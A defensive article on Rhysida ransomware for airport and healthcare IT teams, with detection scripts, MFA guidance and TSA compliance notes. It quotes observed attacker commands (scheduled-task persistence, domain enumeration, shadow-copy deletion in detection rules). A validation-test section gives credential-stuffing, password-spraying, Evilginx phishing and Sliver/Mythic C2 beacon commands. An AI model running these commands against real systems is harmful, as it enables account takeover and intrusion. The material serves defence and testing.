Your VPN Without MFA is Rhysida's Front Door

Strategies that Work to Defend Aviation and Healthcare Against Rhysida Ransomware
Summary

Rhysida ransomware has emerged as a significant threat to aviation infrastructure, with the August 2024 attack on Seattle-Tacoma International Airport serving as a startling case study. The attack caused three weeks of operational disruption, forcing manual processing of baggage and other internal port systems after the Port refused to pay the 100 Bitcoin ($6 million) ransom demand.

This article provides evidence-based defensive strategies tailored for airport IT teams facing this evolving threat. Our analysis finds that 65% of successful attacks leverage VPN credentials without multi-factor authentication. The convergence of TSA regulatory requirements and proven defensive techniques provides a clear roadmap for protection.

Key Findings
Understanding the Adversary

Rhysida operates a Ransomware-as-a-Service (RaaS) model and has actively targeted critical infrastructure since May 2023. Named after a genus of centipedes, the group maintains a "cybersecurity team" persona while demanding Bitcoin payments through Tor-based portals.

Healthcare, Gov, and Aviation Suffer
  • Active victims: 168 organizations posted to leak sites
  • Primary sectors: Healthcare (34%), Government (28%), Aviation (18%)
  • Average downtime: 21 to 24.6 days, depending on sector
  • Payment rates: 25% (down from 48% in 2023)
  • Average ransom demand: $1.54 million
Who They Are

The Rhysida ransomware group emerged in May 2023 and has successfully maintained complete anonymity despite FBI investigations and over 90 documented attacks. While no individual members have been identified or arrested, technical evidence strongly suggests that they operate from Russia or former Soviet states. Their code avoids targeting Eurasian countries, internal communications use Russian, and the malware terminates when detecting Russian language settings.

Security researchers have linked Rhysida with high confidence to the former Vice Society ransomware group, noting identical tactics and the suspicious timing where Vice Society activity stopped just as Rhysida began operations. Unlike some ransomware groups that claim political motivations, Rhysida operates purely for profit, cynically posing as "cybersecurity consultants" in their ransom notes and claiming they're doing victims "a favor" by exposing vulnerabilities.

Rhysida runs a professional Ransomware-as-a-Service operation that specifically targets organizations they believe will pay, with 53% of victims being smaller companies with under 200 employees, though they've also hit major targets like the British Library (causing $8 million in damages), Prospect Medical Holdings (affecting 17 hospitals), and the Port of Seattle (disrupting airport operations for three weeks).

They typically gain initial access through compromised VPN credentials lacking MFA, phishing emails that deliver Cobalt Strike beacons, or exploitation of known vulnerabilities like Zerologon. Once inside, they use legitimate Windows administration tools to move laterally, stage stolen data to attacker-controlled cloud storage with tools like AzCopy, then deploy custom ransomware that encrypts files with ChaCha20 and protects the file keys with 4096-bit RSA. Their double extortion model means they both encrypt systems and threaten to publish stolen data. They have leaked everything from hospital patient records to library employee data when ransoms weren't paid, with demands ranging from $650,000 to $5.8 million.

The good news is that researchers discovered a critical flaw in Rhysida's encryption implementation in February 2024 and released a free decryption tool that has helped hundreds of victims recover data without paying. However, the flaw only affects certain Windows versions, and Rhysida continues to evolve its tactics.

Defensive priorities should focus on three areas:

  • Enforce MFA on all remote access points (their primary entry method)
  • Maintain offline and immutable backups (they specifically target backup systems)
  • Segment your networks to limit lateral movement

Pay special attention if you're in healthcare, education, or government sectors - these represent over 60% of their victims. Watch for indicators like new firewall rules named "Windows Update," suspicious PowerShell activity clearing logs, or files with the .rhysida extension.

Given their willingness to attack hospitals and critical infrastructure without hesitation, assume they will target you regardless of your organization's social importance, and prepare accordingly.

CISA ADVISORY AA23-319A

The November 2023 CISA advisory (last updated April 2025) provides comprehensive technical intelligence on Rhysida operations.

Unpatched VPNs and Weak Creds FTW

1. VPN Exploitation (most attacks)

  • Targets organizations whose VPN has no MFA
    • Protection: Use hardware tokens like YubiKeys or passkeys, and if your VPN vendor doesn't support them, ask them to
  • Exploits weak or reused passwords through credential stuffing and password spraying
    • Protection: Use Have I Been Pwned or ThreatScan.ai to check for leaked domain credentials; alert when one source IP fails against many accounts
  • Purchases access from Initial Access Brokers
    • Protection: Alert on logins from unusual countries, at unusual hours, or faster than travel allows (impossible travel); a bought credential still has to be used from somewhere new
  • Leverages exposed RDP services on ports 3389/3390
    • Protection: Don't expose RDP to the internet; put it behind the VPN (with MFA) or an RDP gateway
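The "alert on unusual location and time" advice above is only useful if someone writes the rule, so here is an added example (not the article's code) that runs three such rules over constructed VPN authentication events: password spraying (one source IP failing against many accounts inside a short window), impossible travel (one account succeeding from two countries faster than a flight), and an off-hours login from a country the account has never used. The field names ts/user/src_ip/country/result and the per-user BASELINE are assumptions; map them to what your concentrator emits, and assume the country field was added by GeoIP enrichment upstream.

```python
"""Flag the VPN authentication patterns that precede a credential-based intrusion.

Added example, not the article's code. Field names, thresholds, the baseline
and every log line below are constructed for the demo.
"""
import json
from collections import defaultdict
from datetime import datetime, timedelta

SPRAY_WINDOW = timedelta(minutes=10)  # distinct accounts failing from one IP
SPRAY_THRESHOLD = 5
TRAVEL_WINDOW = timedelta(hours=2)    # country change faster than this is "impossible"
BUSINESS_HOURS = range(6, 20)         # UTC hours treated as normal; tune per site

# Assumed per-account baseline: countries seen in the last 90 days.
BASELINE = {"jdoe": {"US"}, "svc_backup": {"US"}, "mlee": {"DE"}}

# Constructed sample events, not real logs (RFC 5737 test addresses).
SAMPLE_LOG = """
{"ts": "2025-09-01T02:10:00Z", "user": "jdoe", "src_ip": "203.0.113.7", "country": "US", "result": "success"}
{"ts": "2025-09-01T02:14:00Z", "user": "jdoe", "src_ip": "198.51.100.23", "country": "RU", "result": "success"}
{"ts": "2025-09-01T03:00:00Z", "user": "asmith", "src_ip": "192.0.2.55", "country": "NL", "result": "failure"}
{"ts": "2025-09-01T03:00:07Z", "user": "bjones", "src_ip": "192.0.2.55", "country": "NL", "result": "failure"}
{"ts": "2025-09-01T03:00:15Z", "user": "ckim", "src_ip": "192.0.2.55", "country": "NL", "result": "failure"}
{"ts": "2025-09-01T03:00:22Z", "user": "dpatel", "src_ip": "192.0.2.55", "country": "NL", "result": "failure"}
{"ts": "2025-09-01T03:00:30Z", "user": "egarcia", "src_ip": "192.0.2.55", "country": "NL", "result": "failure"}
{"ts": "2025-09-01T09:30:00Z", "user": "mlee", "src_ip": "192.0.2.10", "country": "DE", "result": "success"}
{"ts": "2025-09-01T14:00:00Z", "user": "svc_backup", "src_ip": "203.0.113.9", "country": "US", "result": "success"}
"""


def parse(log_text):
    """Parse one JSON event per line and return them ordered by timestamp."""
    events = []
    for line in log_text.strip().splitlines():
        event = json.loads(line)
        event["ts"] = datetime.fromisoformat(event["ts"].replace("Z", "+00:00"))
        events.append(event)
    return sorted(events, key=lambda e: e["ts"])


def detect(events):
    """Return a list of alert dicts; each carries a 'type' and the evidence behind it."""
    alerts = []
    failures = defaultdict(list)   # src_ip -> [(ts, user)] for failed logins
    sprayed = set()                # IPs already reported, so one alert per spray
    last_success = {}              # user -> (ts, country) of the previous success

    for e in events:
        if e["result"] != "success":
            failures[e["src_ip"]].append((e["ts"], e["user"]))
            recent_users = {u for t, u in failures[e["src_ip"]] if e["ts"] - t <= SPRAY_WINDOW}
            if len(recent_users) >= SPRAY_THRESHOLD and e["src_ip"] not in sprayed:
                sprayed.add(e["src_ip"])
                alerts.append({"type": "password_spray", "src_ip": e["src_ip"],
                               "users": sorted(recent_users), "ts": e["ts"].isoformat()})
            continue

        # Successful login: compare with the previous success for this account.
        prev = last_success.get(e["user"])
        if prev and prev[1] != e["country"] and e["ts"] - prev[0] <= TRAVEL_WINDOW:
            alerts.append({"type": "impossible_travel", "user": e["user"],
                           "from": prev[1], "to": e["country"],
                           "minutes": int((e["ts"] - prev[0]).total_seconds() // 60)})
        last_success[e["user"]] = (e["ts"], e["country"])

        # Off-hours from a country this account has never used is the IAB-resale signature.
        if e["ts"].hour not in BUSINESS_HOURS and e["country"] not in BASELINE.get(e["user"], set()):
            alerts.append({"type": "offhours_new_country", "user": e["user"],
                           "country": e["country"], "src_ip": e["src_ip"],
                           "ts": e["ts"].isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in detect(parse(SAMPLE_LOG)):
        print(json.dumps(alert))
```

On the sample, jdoe's second login trips both the impossible-travel and the off-hours rules, and 192.0.2.55 is reported once for spraying even though it keeps failing. The spray rule is the one to tune first: a broken SSO integration will also fail many accounts from one IP, so exclude known proxy egress addresses before turning it into an automated block.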

2. Phishing Campaigns (fewer attacks)

  • Spear phishing emails
    • Protection: Mail filters, phishing-resistant MFA (YubiKeys), so a captured password alone is useless
  • Search engine poisoning with malicious ads
  • Fake software downloads (Teams, Zoom installers)
  • Gootloader malware variant deployment
    • Protection: Business-grade EDR (SentinelOne, CrowdStrike, Defender for Endpoint/Business), plus application control (AppLocker/WDAC) so a downloaded installer cannot run from user-writable paths

3. Vulnerability Exploitation (fewer attacks)

  • CVE-2020-1472 (Zerologon): CVSS 10.0, enables domain takeover
  • CVE-2023-20198: Cisco IOS XE web UI privilege escalation (creates a privilege-15 account)
  • CVE-2024-21410: Exchange Server elevation of privilege via NTLM credential relay
  • Unpatched VPN appliances (Fortinet, Pulse Secure)
    • Protection: Patch on a schedule, prioritize anything on CISA's Known Exploited Vulnerabilities list, and isolate what you can't patch
Attack Chain Progression
  1. Initial Access
    • VPN/RDP credential compromise (Protection: Credential testing)
    • Phishing payload execution (Protection: Mail filters, YubiKeys)
    • Web shell installation (Protection: Pentests, EDR, Alerting)
  2. Execution & Persistence
    • Common commands observed (native Windows binaries, run from cmd.exe or PowerShell):
      net group "domain admins" /domain
      nltest /dclist
      schtasks /create /tn "Rhsd" /tr "powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\rhsd.ps1" /sc daily
    • (Protection: EDR; alert on schtasks /create from interactive user sessions and on PowerShell started with -ExecutionPolicy Bypass)
  3. Credential Access
    • NTDS.dit extraction using ntdsutil.exe (Protection: AppLocker)
    • Mimikatz deployment for LSASS dumping (Protection: EDR, Credential Guard)
    • Registry SAM database copying (Protection: EDR)
  4. Lateral Movement
    • PsExec for remote execution (Protection: Firewall rules, Isolation)
    • WMI for stealthy propagation (Protection: Firewall rules, Isolation)
    • RDP sessions to critical servers (Protection: Firewall rules, Isolation)
    • Living-off-the-land binaries (LOLBINs) (Protection: EDR)
  5. Data Exfiltration
    • Azure Storage Explorer for cloud uploads (Protection: largely too late; alert on egress to Azure Blob endpoints or any volume above your firewall traffic baseline)
    • AzCopy command-line transfers (Protection: too late; same egress alerting)
    • FTP to attacker-controlled servers (Protection: too late; block outbound FTP at the edge)
    • Compression using native Windows tools (Protection: too late; bulk archive creation on a file server is itself an alertable event)
  6. Impact
    • File encryption (Protection: Immutable backups)
    • Shadow copy deletion (Protection: Immutable backups; alert on vssadmin delete shadows)
    • 7-day payment deadline (Protection: Tested playbooks)
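Every stage in the chain above leaves a command line behind, so the cheapest detection is to match process-creation telemetry against them and then correlate by host. The following is an added example, not the article's or CISA's code: it runs one regex rule per observed technique over constructed Sysmon-style events (host, user, command_line; real Sysmon Event ID 1 or Windows 4688 records carry the same data under other field names) and escalates any host that has crossed three distinct stages, so discovery, persistence and log clearing on one workstation become one incident rather than three unrelated alerts. Hostnames, paths and the storage URL are made up.

```python
"""Match process-creation telemetry against the Rhysida attack chain.

Added example, not the article's code. Events below are constructed.
"""
import json
import re
from collections import defaultdict

# (rule name, attack stage, regex applied to the lower-cased command line)
RULES = [
    ("domain_admin_enum", "discovery",
     re.compile(r'net1?(\.exe)?\s+group\s+"?domain admins"?\s+/domain')),
    ("dc_enum", "discovery", re.compile(r'nltest(\.exe)?\s+/dclist')),
    ("rhsd_scheduled_task", "persistence",
     re.compile(r'schtasks(\.exe)?\s+/create.*(/tn\s+"?rhsd"?|-executionpolicy\s+bypass)')),
    ("ntds_extraction", "credential_access",
     re.compile(r'ntdsutil(\.exe)?.*(ac\s+i\s+ntds|\bifm\b|create\s+full)')),
    ("sam_hive_dump", "credential_access", re.compile(r'reg(\.exe)?\s+save\s+hklm\\(sam|system)\b')),
    ("psexec_remote_exec", "lateral_movement", re.compile(r'\bpsexe(c|svc)(\.exe)?\b')),
    ("wmi_remote_exec", "lateral_movement", re.compile(r'wmic(\.exe)?\s+/node:')),
    ("fake_windows_update_fw_rule", "defense_evasion",
     re.compile(r'netsh\s+advfirewall\s+firewall\s+add\s+rule\s+name="?windows update"?')),
    ("event_log_cleared", "defense_evasion", re.compile(r'(wevtutil(\.exe)?\s+cl\b|clear-eventlog)')),
    ("azcopy_exfil", "exfiltration", re.compile(r'azcopy(\.exe)?\s+(copy|cp|sync)\b')),
    ("shadow_copy_deletion", "impact",
     re.compile(r'(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)')),
]

# Constructed sample events (raw string so JSON sees escaped backslashes).
SAMPLE_EVENTS = r"""
{"host": "WS-042", "user": "CORP\\jdoe", "command_line": "net group \"domain admins\" /domain"}
{"host": "WS-042", "user": "CORP\\jdoe", "command_line": "nltest /dclist corp.local"}
{"host": "WS-042", "user": "CORP\\jdoe", "command_line": "schtasks /create /tn \"Rhsd\" /tr \"powershell.exe -ExecutionPolicy Bypass -File C:\\Users\\Public\\rhsd.ps1\" /sc daily"}
{"host": "WS-042", "user": "CORP\\jdoe", "command_line": "powershell.exe -c \"wevtutil cl Security; wevtutil cl System\""}
{"host": "WS-042", "user": "CORP\\jdoe", "command_line": "svchost.exe -k netsvcs -p"}
{"host": "DC01", "user": "CORP\\jdoe", "command_line": "ntdsutil \"ac i ntds\" \"ifm\" \"create full C:\\Windows\\Temp\\ifm\" q q"}
{"host": "FS01", "user": "NT AUTHORITY\\SYSTEM", "command_line": "netsh advfirewall firewall add rule name=\"Windows Update\" dir=in action=allow protocol=TCP localport=3389"}
{"host": "FS01", "user": "CORP\\jdoe", "command_line": "azcopy.exe copy \"D:\\Shares\\Payroll\" \"https://exfil0001.blob.core.windows.net/stage?sv=2022-11-02&sig=REDACTED\" --recursive"}
{"host": "FS01", "user": "NT AUTHORITY\\SYSTEM", "command_line": "vssadmin delete shadows /all /quiet"}
"""


def load(text):
    """One JSON event per line."""
    return [json.loads(line) for line in text.strip().splitlines()]


def scan(events):
    """Return one hit per (event, rule) match, carrying the stage for correlation."""
    hits = []
    for event in events:
        cmd = event["command_line"].lower()
        for name, stage, pattern in RULES:
            if pattern.search(cmd):
                hits.append({"host": event["host"], "user": event["user"], "rule": name,
                             "stage": stage, "command_line": event["command_line"]})
    return hits


def stages_by_host(hits):
    """Distinct attack stages seen per host, sorted for stable output."""
    stages = defaultdict(set)
    for hit in hits:
        stages[hit["host"]].add(hit["stage"])
    return {host: sorted(s) for host, s in stages.items()}


def escalate(stage_map, min_stages=3):
    """Hosts that crossed min_stages distinct stages: treat as an active intrusion, isolate."""
    return sorted(host for host, stages in stage_map.items() if len(stages) >= min_stages)


if __name__ == "__main__":
    hits = scan(load(SAMPLE_EVENTS))
    for hit in hits:
        print(f'{hit["host"]:7} {hit["stage"]:18} {hit["rule"]:28} {hit["command_line"][:60]}')
    print("escalate:", escalate(stages_by_host(hits)))
```

On the sample, WS-042 (discovery, persistence, log clearing) and FS01 (firewall rule, AzCopy, shadow copy deletion) are escalated while DC01, which only shows the ntdsutil dump, is not; in practice a single ntdsutil hit on a domain controller deserves its own page, which is the point of keeping the per-rule hits alongside the per-host roll-up. The regexes key on the binaries CISA lists, so an attacker renaming azcopy.exe evades the exfil rule; pair it with the egress-volume alerting noted in the chain above.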
TSA Requirements Implementation

The March 7, 2023 TSA Emergency Amendment mandates four critical security measures.

Network Segmentation Requirements

Ensure operational technology can function independently if IT systems are compromised. Review firewall rules, endpoint rules, and validate that connections to and from crown jewel systems are limited or blocked.

Access Control Implementation

Multi-factor authentication for critical systems. MFA is an imperative, but only some forms are phishing-resistant: FIDO2/WebAuthn hardware tokens or passkeys, and certificate-based mutual authentication (PIV/smart cards). Push approvals and one-time codes can be relayed through a reverse-proxy phishing page in real time, so they stop credential stuffing but not a targeted phish.

  • MFA on ALL remote access (VPN, RDP, SSH, M365)
  • Privileged account protection (limited admins and sudoers)
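To make the phishing-resistance distinction concrete, here is an added example (not the article's code) that plays out both factors against a reverse-proxy phishing kit of the Evilginx kind. A TOTP code is six digits the victim types, so the proxy relays it and the portal accepts it. A WebAuthn assertion is a signature over data that includes the origin the browser was actually on, and the browser refuses to produce one at all when the relying party ID is not a registrable suffix of that origin. The "authenticator" signs with HMAC-SHA256 over a secret shared with the relying party; that is a stand-in for the ECDSA key pair a real security key holds, chosen so the demo runs on the standard library alone. All hostnames, secrets and challenges are made up.

```python
"""Why a relayed OTP passes and a relayed WebAuthn assertion does not.

Added example, not code from the article. HMAC stands in for the
authenticator's ECDSA signature; everything else is made up.
"""
import hashlib
import hmac
import json
import struct

REAL_ORIGIN = "https://vpn.example-airport.org"
PHISH_ORIGIN = "https://vpn.example-airport.org.login-portal.evil"  # the proxy's domain
RP_ID = "example-airport.org"  # WebAuthn relying party ID bound to the credential


# --- TOTP (RFC 6238): the factor that is NOT phishing-resistant ---------------
def totp(seed, unix_time, step=30, digits=6):
    counter = struct.pack(">Q", unix_time // step)
    mac = hmac.new(seed, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % (10 ** digits)
    return f"{code:0{digits}d}"


def relay_totp_attack(seed, unix_time):
    """Victim types the code into the phishing page; proxy replays it to the real portal."""
    code_seen_by_proxy = totp(seed, unix_time)
    return hmac.compare_digest(totp(seed, unix_time), code_seen_by_proxy)


# --- WebAuthn-style assertion: the factor that IS phishing-resistant ----------
def authenticator_sign(cred_secret, rp_id, challenge, page_origin):
    """clientDataJSON records the origin the browser is on; the authenticator
    signs authenticatorData || SHA-256(clientDataJSON), as a real key does."""
    client_data = json.dumps({"type": "webauthn.get", "challenge": challenge,
                              "origin": page_origin}).encode()
    # rpIdHash (32 bytes) || flags (UP set) || signCount
    auth_data = hashlib.sha256(rp_id.encode()).digest() + b"\x01" + b"\x00\x00\x00\x01"
    signature = hmac.new(cred_secret, auth_data + hashlib.sha256(client_data).digest(),
                         hashlib.sha256).digest()
    return {"clientDataJSON": client_data, "authenticatorData": auth_data, "signature": signature}


def browser_get_assertion(cred_secret, page_origin, rp_id, challenge):
    """The browser only allows an rpId that is the page's domain or a parent of it."""
    host = page_origin.split("://", 1)[1].split("/", 1)[0]
    if host != rp_id and not host.endswith("." + rp_id):
        return None
    return authenticator_sign(cred_secret, rp_id, challenge, page_origin)


def rp_verify_assertion(cred_secret, assertion, expected_challenge):
    """Relying-party checks: challenge, origin, rpIdHash, then the signature."""
    client_data = json.loads(assertion["clientDataJSON"])
    if client_data.get("type") != "webauthn.get" or client_data.get("challenge") != expected_challenge:
        return False, "bad type or challenge"
    if client_data.get("origin") != REAL_ORIGIN:
        return False, "origin mismatch: " + str(client_data.get("origin"))
    if assertion["authenticatorData"][:32] != hashlib.sha256(RP_ID.encode()).digest():
        return False, "rpIdHash mismatch"
    expected = hmac.new(cred_secret, assertion["authenticatorData"] +
                        hashlib.sha256(assertion["clientDataJSON"]).digest(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, assertion["signature"]):
        return False, "bad signature"
    return True, "ok"


def legitimate_webauthn_login(cred_secret, challenge):
    assertion = browser_get_assertion(cred_secret, REAL_ORIGIN, RP_ID, challenge)
    return rp_verify_assertion(cred_secret, assertion, challenge)


def relay_webauthn_attack(cred_secret, challenge):
    """Proxy forwards the portal's real challenge to the victim's browser on the phishing origin."""
    assertion = browser_get_assertion(cred_secret, PHISH_ORIGIN, RP_ID, challenge)
    if assertion is None:
        return False, "browser refused: rpId is not valid for " + PHISH_ORIGIN
    return rp_verify_assertion(cred_secret, assertion, challenge)


if __name__ == "__main__":
    seed, cred = b"constructed-totp-seed", b"constructed-credential-secret"
    print("TOTP relayed through proxy accepted:", relay_totp_attack(seed, 1_700_000_000))
    print("WebAuthn legitimate login:", legitimate_webauthn_login(cred, "challenge-1"))
    print("WebAuthn relayed through proxy:", relay_webauthn_attack(cred, "challenge-1"))
    # Even a browser that ignored the rpId rule would hand over an assertion the RP rejects:
    forged = authenticator_sign(cred, RP_ID, "challenge-1", PHISH_ORIGIN)
    print("WebAuthn with phishing origin in clientData:", rp_verify_assertion(cred, forged, "challenge-1"))
```

Two independent checks stop the relay: the browser's rpId rule, and the relying party's origin comparison on clientDataJSON. A VPN vendor's "MFA support" that only covers OTP or push gives you neither, which is why the earlier advice is to ask for FIDO2 or certificate auth by name.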
Continuous Monitoring Requirements

24/7 detection of unauthorized access and anomalies: logging, SIEM forwarding, and alerting. Your MSSP and EDR logs are a great start, but make sure your operational environments have visibility too.

Vulnerability Management

Patch critical vulnerabilities within defined timeframes. Patch management is table stakes, but regular vulnerability scanning with tools like runZero, or even open-source tools like Nuclei, will find what patching missed.

Not mentioned, but Critical

Manual Fallback Procedures

  • Paper-based processes, table-topped, and documented
  • Printed operating procedures

Backup testing and recovery

  • 3-2-1-1-0 Rule: 3 copies of data, 2 different storage types, 1 offsite copy, 1 offline/air-gapped copy, 0 errors on recovery testing
Simple Validation Tests
  1. Initial Access Testing
# Real-world credential stuffing
credmaster --proxy-file residential_proxies.txt --delay 30-90 \
 --jitter 20 --target <VPN> --pairs leaked_creds.csv

# Test against your actual infrastructure (quote the password so the shell
# does not treat '!' as history expansion)
trevorspray -u users.txt -p 'Fall2025!' --url https://<VPN> \
 --delay 60 --jitter 25 --proxy rotating

# Phishing Simulation
Targeted phishing campaign against employees with links to Evilginx-proxied VPN login pages
  2. Execution Testing
# Atomic Red Team - https://github.com/redcanaryco/atomic-red-team
Invoke-AtomicTest T1059.001 -TestNumbers 1,2,5  # PowerShell
Invoke-AtomicTest T1053.005 -TestNumbers 1      # Scheduled Task
Invoke-AtomicTest T1055.001 -TestNumbers 1      # Process Injection

# Sliver C2
sliver-server > generate beacon --mtls 1.2.3.4:8443 --skip-symbols \
 --evasion --seconds 60 --jitter 30

# Mythic C2
mythic -c apollo -p http,smb --sleep 60 --jitter 25 \
 --killdate 30d --param "ppid_spoof=explorer.exe"
  3. Persistence Testing
# Create persistence, confirm your EDR/SIEM raised an alert, then remove it
schtasks /create /tn "TestRhsd" /tr "cmd.exe /c echo test" /sc daily /ru SYSTEM

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v TestRhysida /d "C:\test.exe"
  4. Canary Infrastructure (Try Thinkst Canaries)
    • Deploy honey credentials in AD (service accounts named "backup_svc", "sql_admin")
    • Create SMB shares: \\fileserver\Payroll_Data (empty but monitored)
    • Scatter canary documents: "Network_Passwords.xlsx" with beacon URLs
    • Alert on ANY touch - zero false positives by design
  5. Tabletop Scenarios or Wargaming (Applied Tabletops)
    1. VPN compromise: measure time to detect, time to isolate, and time to the decision to invoke IR, with an inject that admin credentials were also compromised
    2. Ransomware detonation during peak operations: measure time to invoke manual processes and to communicate, with an inject that crown jewel systems are encrypted
Technology Takeaways
  1. Enable MFA everywhere - This single control prevents most ransomware attacks. No exceptions for executives or service accounts. Prioritize hardware tokens.
  2. Test your backups monthly - Organizations that test monthly recover significantly faster than those who only create backups.
  3. Monitor PowerShell religiously - Most Rhysida attacks use PowerShell. If you see unauthorized PowerShell, assume breach.
  4. Segment your networks now - When (not if) ransomware hits, segmentation is the difference between IT outage and organization downtime.
  5. Document manual procedures - Some organizations stayed operational because they could process things on paper. Can you?
Business Takeaways
  1. Budget for response, not just prevention - Recovery costs average a third more than ransom demands. Plan accordingly.
  2. Refusing ransom is expensive but right - Paying doesn't guarantee recovery and marks you for repeat attacks.
  3. Compliance helps security - TSA requirements aren't bureaucracy—they directly counter Rhysida's methods.
  4. Speed is everything - Each hour of delay increases recovery cost significantly
  5. Insurance requires proof - Insurers demand evidence of MFA, backups, and testing. No proof = no coverage. A large portion of claims are partially denied.
Security Response Takeaways
  1. Hunt for basics, not advanced - Rhysida doesn't need zero-days when you lack MFA.
  2. Focus on detection speed - You have limited time from initial PowerShell to lateral movement.
  3. Practice with safe tools - Use Atomic Red Team regularly. Real attacks don't wait for convenient timing.
  4. Automate response actions - By the time you see the alert and decide, it's too late. Automate isolation.
Take Action Today

The ransomware threat to aviation infrastructure is neither theoretical nor distant—it’s active, evolving, and specifically targeting the aviation sector. The Port of Seattle incident demonstrates both the devastating potential of these attacks and the effectiveness of proper preparation.

Success against Rhysida simply requires disciplined implementation of fundamental controls: multi-factor authentication, PowerShell restrictions, network segmentation, and tested backups. Organizations implementing these controls achieve dramatic risk reduction.

The convergence of TSA regulatory requirements and security best practices provides a clear path forward. Every requirement in the March 2023 mandate addresses specific Rhysida tactics.

The message is clear: implement basic controls before you're the next headline. The economics are equally clear: prevention costs thousands, recovery costs tens of thousands, and reputation damage is incalculable.

The question isn't whether ransomware will target you - they will. The question is whether you’ll be prepared when they do.
